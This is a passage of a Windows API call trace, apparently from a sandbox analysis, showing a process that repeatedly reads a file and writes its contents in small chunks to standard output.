returned 0x50 [0193.069] GetFileType (hFile=0x50) returned 0x1 [0193.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.069] GetFileType (hFile=0x50) returned 0x1 [0193.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.069] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] GetFileType (hFile=0x50) returned 0x1 [0193.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.070] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=4) returned 
0x58 [0193.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.071] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, 
lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.071] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.072] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.072] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] GetFileType (hFile=0x50) returned 0x1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.072] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 
0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.073] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) 
returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] GetFileType (hFile=0x50) returned 0x1 [0193.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.073] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0193.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.074] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] GetFileType (hFile=0x50) returned 0x1 [0193.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.074] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.075] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType 
(hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.075] GetFileType (hFile=0x50) returned 0x1 [0193.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.076] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, 
lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.076] GetFileType (hFile=0x50) returned 0x1 [0193.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, 
lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.077] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.077] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] GetFileType (hFile=0x50) returned 0x1 [0193.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.077] WriteFile (in: hFile=0x50, 
